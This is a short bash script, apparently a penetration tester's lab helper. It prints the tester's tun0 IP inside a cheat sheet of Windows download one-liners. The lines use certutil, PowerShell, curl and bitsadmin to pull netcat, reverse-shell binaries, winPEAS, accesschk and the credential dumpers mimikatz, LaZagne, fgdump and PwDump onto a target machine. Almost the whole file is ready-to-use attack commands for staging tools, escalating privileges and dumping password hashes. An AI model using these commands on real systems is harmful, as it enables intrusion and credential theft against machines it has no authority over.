#!/bin/bash

# create an alias `ftw` to invoke this script 

# TUN0IP=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1)
TUN0IP=$((ifconfig tun0 | awk '/inet /{print $2}') 2>/dev/null)
echo ""
echo "tun0: $TUN0IP"
echo ""
echo "==================================="
echo "      Windows File Transfer"
echo "==================================="
echo ""
echo "certutil -urlcache -f http://$TUN0IP/winPEASx64.exe wp64.exe"
echo "certutil -urlcache -split -f http://$TUN0IP/winPEASx64.exe wp64.exe"
echo "certutil -urlcache -f http://$TUN0IP/winPEAS.bat win.bat"
echo "certutil -urlcache -f http://$TUN0IP/nc64.exe nc.exe"
echo "certutil -urlcache -f http://$TUN0IP/rev.exe rev.exe"
echo "certutil -urlcache -f http://$TUN0IP/shell.exe shell.exe"
echo "powershell.exe wget http://$TUN0IP/winPEASx64.exe -OutFile C:\Temp\wp64.exe"
echo "powershell.exe -command iwr -Uri http://$TUN0IP/winPEASx64.exe -OutFile C:\Temp\wp64.exe"
echo "powershell.exe (New-Object System.Net.WebClient).DownloadFile(\"http://$TUN0IP/nc.exe\",\"C:\Temp\nc.exe\")"
echo "curl -O http://$TUN0IP/nc.exe"
echo "curl http://$TUN0IP/nc.exe -o nc.exe"
echo "bitsadmin /transfer transfName /priority high http://$TUN0IP/nc.exe C:\Temp\nc.exe"
echo ""
echo "-----------------------------------"
echo ""
echo "Try usernames as passwords"
echo "Fix PATH on Windows:"
echo "set PATH=%SystemRoot%\system32;%SystemRoot%;"
echo ""
echo "==================================="
echo "   Windows Privilege Escalation"
echo "==================================="
echo ""
echo "curl http://$TUN0IP/accesschk.exe.exe -o acc.exe"
echo "certutil -urlcache -f http://$TUN0IP/accesschk.exe.exe acc.exe"
echo "powershell.exe -command iwr -Uri http://$TUN0IP/accesschk.exe.exe -OutFile acc.exe"
echo ""
echo "==================================="
echo "      Dumping Windows Hashes"
echo "==================================="
echo ""
echo "powershell.exe -command iwr -Uri http://$TUN0IP/fgdump.exe -OutFile C:\Temp\fg.exe"
echo "powershell.exe -command iwr -Uri http://$TUN0IP/fgdump.exe -OutFile fg.exe"
echo "certutil -urlcache -f http://$TUN0IP/fgdump.exe fg.exe"
echo "curl http://$TUN0IP/fgdump.exe -o fg.exe"
echo "powershell.exe -command iwr -Uri http://$TUN0IP/PwDump.exe -OutFile pw.exe"
echo "certutil -urlcache -f http://$TUN0IP/PwDump.exe pw.exe"
echo "curl http://$TUN0IP/PwDump.exe -o pw.exe"
echo "powershell.exe -command iwr -Uri http://$TUN0IP/lazagne.exe -OutFile lz.exe"
echo "certutil -urlcache -f http://$TUN0IP/lazagne.exe lz.exe"
echo "curl http://$TUN0IP/lazagne.exe -o lz.exe"
echo "powershell.exe -command iwr -Uri http://$TUN0IP/mimikatz.exe -OutFile mi.exe"
echo "certutil -urlcache -f http://$TUN0IP/mimikatz.exe mi.exe"
echo "curl http://$TUN0IP/mimikatz.exe -o mi.exe"
echo ""
echo "More at: https://book.hacktricks.xyz/exfiltration"

